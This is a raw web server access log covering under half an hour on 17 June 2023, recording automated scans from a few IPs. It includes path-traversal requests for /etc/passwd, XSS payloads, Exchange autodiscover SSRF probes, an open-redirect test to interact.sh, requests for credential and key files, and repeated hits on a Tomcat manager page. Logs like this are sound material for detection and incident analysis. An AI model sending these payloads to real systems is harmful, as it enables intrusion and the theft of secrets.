107.189.31.184 - - [17/Jun/2023:23:31:57 +0530] "GET /cobbler/ HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:23:31:58 +0530] "GET /cobbler/ HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:23:31:59 +0530] "GET /cblr/ HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:23:32:00 +0530] "GET /cblr/ HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:23:32:16 +0530] "GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1" 404 1112
107.189.31.184 - - [17/Jun/2023:23:32:17 +0530] "GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1" 404 1112
151.238.158.80 - - [17/Jun/2023:23:32:24 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:23:32:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:33:16 +0530] "GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:23:33:17 +0530] "GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1" 404 1032
41.186.73.134 - - [17/Jun/2023:23:33:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:35:43 +0530] "GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:23:35:45 +0530] "GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:23:35:46 +0530] "GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:23:35:48 +0530] "GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:23:36:59 +0530] "GET /assets/file:%2f%2f/etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:23:37:01 +0530] "GET /assets/file:%2f%2f/etc/passwd HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:23:37:12 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:38:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:40:58 +0530] "POST /api/admin/login HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:23:40:59 +0530] "POST /api/admin/login HTTP/1.1" 404 1024
41.186.73.134 - - [17/Jun/2023:23:41:24 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:41:30 +0530] "GET /cfcache.map HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:23:41:31 +0530] "GET /cfcache.map HTTP/1.1" 404 1016
41.186.73.134 - - [17/Jun/2023:23:42:26 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:43:11 +0530] "POST /OA_HTML/lcmServiceController.jsp HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:23:43:12 +0530] "POST /OA_HTML/lcmServiceController.jsp HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:23:45:05 +0530] "GET /wp-admin/admin-ajax.php?action=aux_the_recent_products&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E&data[wp_query_args][post_type]=post HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:23:45:06 +0530] "GET /wp-admin/admin-ajax.php?action=aux_the_recent_products&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E&data[wp_query_args][post_type]=post HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:23:45:14 +0530] "GET /photoalbum/index.php?url=../../../../../../../../../../../../etc/passwd%00&urlancien HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:23:45:15 +0530] "GET /photoalbum/index.php?url=../../../../../../../../../../../../etc/passwd%00&urlancien HTTP/1.1" 404 1034
41.186.73.134 - - [17/Jun/2023:23:45:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:46:35 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:49:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:50:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:50:53 +0530] "POST /atutor/login.php HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:23:50:53 +0530] "POST /atutor/login.php HTTP/1.1" 404 1026
45.156.128.12 - - [17/Jun/2023:23:50:56 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
107.189.31.184 - - [17/Jun/2023:23:51:23 +0530] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:23:51:24 +0530] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:23:52:42 +0530] "GET /register/?redirect_to=https://interact.sh/ HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:23:52:42 +0530] "GET /register/?redirect_to=https://interact.sh/ HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:23:53:11 +0530] "GET /credentials.json HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:23:53:12 +0530] "GET /credentials.json HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:23:53:14 +0530] "GET /assets/credentials.json HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:23:53:15 +0530] "GET /assets/credentials.json HTTP/1.1" 404 1040
41.186.73.134 - - [17/Jun/2023:23:53:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:54:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:55:47 +0530] "GET /anything_here HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:23:55:47 +0530] "GET /anything_here HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:23:56:06 +0530] "site cpfr null" 400 -
107.189.31.184 - - [17/Jun/2023:23:56:06 +0530] "site cpfr null" 400 -
41.186.73.134 - - [17/Jun/2023:23:58:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
45.128.232.141 - - [17/Jun/2023:23:58:46 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:23:59:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:59:22 +0530] "GET /config/database.yml HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:23:59:23 +0530] "GET /config/database.yml HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:23:59:45 +0530] "GET /apiserver-etcd-client.key HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:23:59:46 +0530] "GET /apiserver-etcd-client.key HTTP/1.1" 404 1044